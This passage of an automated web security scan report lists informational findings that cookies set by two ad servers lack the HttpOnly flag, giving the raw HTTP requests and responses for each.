HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/MF-Static_Diversification 120x60.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1209:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1209:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/ Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_0Setup.png P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.63. http://ad.yieldmanager.com/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/pixel
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:bh="b!!!#O!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gZi!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pixel?adv=274138&code=4X7ERY5MVFDBLHMTRJRP2G_n&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUshG%Lm!79C8vK!a(; ih="b!!!!0!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI)BgvR/4M6EqoyOxB!!w[/!79C8#8K*x; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246
Response
